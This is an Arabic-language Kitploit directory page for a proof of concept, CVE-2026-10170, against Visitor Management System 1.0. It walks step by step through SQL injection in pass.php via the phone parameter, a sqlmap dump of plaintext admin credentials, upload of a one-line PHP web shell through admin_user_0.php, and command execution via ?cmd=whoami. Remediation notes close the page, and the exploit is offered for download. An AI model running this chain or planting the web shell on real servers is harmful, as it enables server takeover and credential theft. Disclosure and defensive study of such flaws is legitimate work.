Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-10170-RCE — إثبات مفهوم يوضح حقن SQL ورفع الملفات غير المقيد معًا لتحقيق تنفيذ التعليمات البرمجية عن بُعد في نظام إدارة الزوار 1.0، بما في ذلك دليل الاستغلال خطوة بخطوة وإرشادات المعالجة. | Kitploit
أدوات/GitHubGitHub/xmyronn/cve-2026-10170-rce
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubxmyronn/cve-2026-10170-rce

CVE-2026-10170-RCE

إثبات مفهوم يوضح حقن SQL ورفع الملفات غير المقيد معًا لتحقيق تنفيذ التعليمات البرمجية عن بُعد في نظام إدارة الزوار 1.0، بما في ذلك دليل الاستغلال خطوة بخطوة وإرشادات المعالجة.

عرض المستودع
3منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

نظام إدارة الزوار 1.0 - من حقن SQL إلى تنفيذ الأوامر عن بُعد (سلسلة هجوم)

معلومات الثغرة

الحقلالتفاصيل
المنتجنظام إدارة الزوار
البائعcode-projects.org
الإصدار1.0
فئات الثغراتحقن SQL (CWE-89) + رفع ملفات غير مقيد (CWE-434)
معرف CVEقيد الانتظار
درجة CVSS9.8 حرجة (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
المصادقة المطلوبةصلاحية منخفضة (حساب حارس) كنقطة دخول
الملفات المتأثرة/vms/php/pass.php, /vms/php/admin_user_0.php
المعامل القابل للاستغلالphone (POST)

الوصف

نظام إدارة الزوار 1.0 من code-projects.org عرضة لسلسلة هجوم حرجة تجمع بين حقن SQL ورفع الملفات غير المقيد مما يؤدي إلى تنفيذ الأوامر عن بُعد.

يمكن للمهاجم الذي يمتلك وصولاً بصلاحية منخفضة (حساب حارس) استغلال ثغرة حقن SQL في pass.php عبر معامل phone (POST) لتفريغ قاعدة البيانات بالكامل — بما في ذلك بيانات اعتماد المسؤول بنص واضح. باستخدام بيانات الاعتماد المستخرجة للمصادقة كمسؤول، يمكن للمهاجم بعد ذلك رفع قشرة ويب PHP عبر لوحة إدارة المستخدمين (admin_user_0.php)، والتي لا تقوم بأي تحقق من نوع الملف أو الامتداد. يتم تخزين القشرة المرفوعة في دليل يمكن الوصول إليه عبر الويب ويمكن تنفيذها مباشرة عبر URL، مما يؤدي إلى تنفيذ أوامر كامل عن بُعد على الخادم.

بالإضافة إلى ذلك، يتم تخزين كلمات المرور بنص واضح في قاعدة البيانات، مما يعني عدم الحاجة إلى خطوة كسر التجزئة بعد تفريغ SQLi.


نظرة عامة على سلسلة الهجوم

root@kitploit:~
تسجيل دخول الحارس بصلاحية منخفضة
        ↓
حقن SQL في pass.php (معامل phone)
        ↓
تفريغ sqlmap → استخراج بيانات اعتماد المسؤول بنص واضح
        ↓
تسجيل الدخول كمسؤول (sanjay1:7861)
        ↓
رفع ملفات غير مقيد في admin_user_0.php
        ↓
رفع قشرة ويب PHP إلى /vms/php/folder/
        ↓
تنفيذ الأوامر عن بُعد عبر ?cmd=whoami → اختراق كامل للخادم

إثبات المفهوم خطوة بخطوة

الخطوة 1 — تسجيل الدخول كمستخدم بصلاحية منخفضة (حارس)

انتقل إلى تطبيق VMS وسجل الدخول ببيانات اعتماد الحارس. بعد تسجيل الدخول، انتقل إلى صفحة رقم الهاتف:

root@kitploit:~
http://<TARGET>/vms/php/phone_0.php
Screenshot 2026-05-05 034206

الخطوة 2 — تأكيد حقن SQL في pass.php

أرسل علامة اقتباس مفردة ' كقيمة رقم الهاتف. يظهر التطبيق خطأ MariaDB قاتلاً يكشف الاستعلام الأصلي ومسار الملف:

root@kitploit:~
Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; 
check the manual that corresponds to your MariaDB server version for the right 
syntax to use near '2026-05-05'' at line 1 in 
C:\xampp\htdocs\vms\php\pass.php:9
Stack trace:
#0 C:\xampp\htdocs\vms\php\pass.php(9): mysqli_query(Object(mysqli), 'select * from i...')

الملف المتأثر: pass.php السطر 9
المعامل القابل للاستغلال: phone (POST)

Screenshot 2026-05-05 034215

خطأ SQL Screenshot 2026-05-05 034228


الخطوة 3 — استغلال SQLi باستخدام sqlmap

احفظ الطلب الملتقط من Burp Suite في ملف (sqli.txt) وقم بتشغيل sqlmap:

root@kitploit:~
sqlmap -r sqli.txt --dump --batch

يقوم sqlmap بنجاح بتفريغ جدول login_user من قاعدة بيانات vms، مما يكشف بيانات اعتماد بنص واضح لجميع المستخدمين:

root@kitploit:~
Database: vms
Table: login_user
[2 entries]
+----+---------+------------+---------+-------+--------+----------+-----------+
| id | image   | phone      | name    | user  | gender | password | username  |
+----+---------+------------+---------+-------+--------+----------+-----------+
| 1  | <blank> | 8146905071 | sanjay  | guard | male   | 786      | sanjay123 |
| 2  | <blank> | 8146905071 | sanjay1 | admin | male   | 7861     | sanjay1   |
+----+---------+------------+---------+-------+--------+----------+-----------+

ملاحظة: يتم تخزين كلمات المرور بنص واضح — لا حاجة لكسر التجزئة.

Screenshot 2026-05-05 034316

الخطوة 4 — تسجيل الدخول كمسؤول

باستخدام بيانات اعتماد المسؤول المستخرجة، سجل الدخول إلى لوحة تحكم المسؤول:

root@kitploit:~
Username: sanjay1
Password: 7861

أصبحت لوحة تحكم المسؤول الكاملة متاحة الآن بما في ذلك إدارة الموظفين والإدارات ومستخدمي المسؤولين والتقارير.

Screenshot 2026-05-05 034353

الخطوة 5 — رفع قشرة ويب PHP عبر لوحة مستخدمي المسؤولين

انتقل إلى صفحة إدارة مستخدمي المسؤولين:

root@kitploit:~
http://<TARGET>/vms/php/admin_user_0.php

تحتوي الصفحة على حقل رفع ملفات لصورة الملف الشخصي. لا يقوم التطبيق بأي تحقق من نوع الملف، ولا فلترة للامتداد، ولا فحص لنوع MIME.

املأ النموذج بأي قيم وارفع قشرة ويب PHP التالية كملف الصورة (web2_command.php):

root@kitploit:~
<?php echo shell_exec($_GET['cmd']); ?>
Screenshot 2026-05-05 034416

الخطوة 6 — تأكيد رفع القشرة

انتقل إلى صفحة عرض مستخدمي المسؤولين:

root@kitploit:~
http://<TARGET>/vms/php/admin_display_0.php

يكون حساب المسؤول المنشأ حديثاً ظاهراً في الجدول. يتم تخزين القشرة المرفوعة في:

root@kitploit:~
http://<TARGET>/vms/php/folder/web2_command.php
Screenshot 2026-05-05 034429

الخطوة 7 — تنفيذ الأوامر عن بُعد

نفذ أوامر النظام التعسفية عبر القشرة:

root@kitploit:~
http://<TARGET>/vms/php/folder/web2_command.php?cmd=whoami

النتيجة: يعيد الخادم مستخدم النظام الحالي مما يؤكد تنفيذ الأوامر الكامل عن بُعد:

root@kitploit:~
desktop-g1i9np3\dell
Screenshot 2026-05-05 034438

التأثير

  • اختراق كامل لقاعدة البيانات — تفريغ جميع الجداول عبر SQLi بما في ذلك بيانات الاعتماد بنص واضح
  • الاستيلاء على حساب المسؤول — كلمات المرور بنص واضح لا تتطلب كسراً
  • تنفيذ الأوامر عن بُعد — تنفيذ أوامر نظام تعسفية كمستخدم خادم الويب
  • اختراق كامل للخادم — سيطرة كاملة على المضيف الأساسي
  • تخزين كلمات المرور بنص واضح — يضخم تأثير SQLi، بيانات الاعتماد قابلة للاستخدام فوراً

ملخص الملفات المتأثرة

الملفالثغرة
/vms/php/pass.phpحقن SQL عبر معامل phone (POST)
/vms/php/admin_user_0.phpرفع ملفات غير مقيد — لا تحقق من الامتداد أو MIME
/vms/php/folder/دليل تخزين القشرة — يمكن الوصول إليه عبر الويب، بدون قيود

المعالجة

لحقن SQL:

root@kitploit:~
$stmt = $conn->prepare("SELECT * FROM login_user WHERE phone = ?");
$stmt->bind_param("s", $phone);
$stmt->execute();

لرفع الملفات:

  • قائمة بيضاء بالامتدادات المسموحة (jpg, png, gif فقط)
  • التحقق من نوع MIME على جانب الخادم
  • تخزين الملفات المرفوعة خارج جذر الويب
  • إعادة تسمية الملفات المرفوعة إلى سلاسل عشوائية

لتخزين كلمات المرور:

  • استخدام password_hash() و password_verify() — لا تخزن أبداً بنص واضح

المراجع

  • الصفحة الرئيسية للبائع
  • CWE-89: حقن SQL
  • CWE-434: رفع غير مقيد لملف بنوع خطير
  • ورقة غش رفع الملفات من OWASP

المكتشف

  • الباحث: عماد علوي
  • VulDB: imad alvi
تنزيل الأداة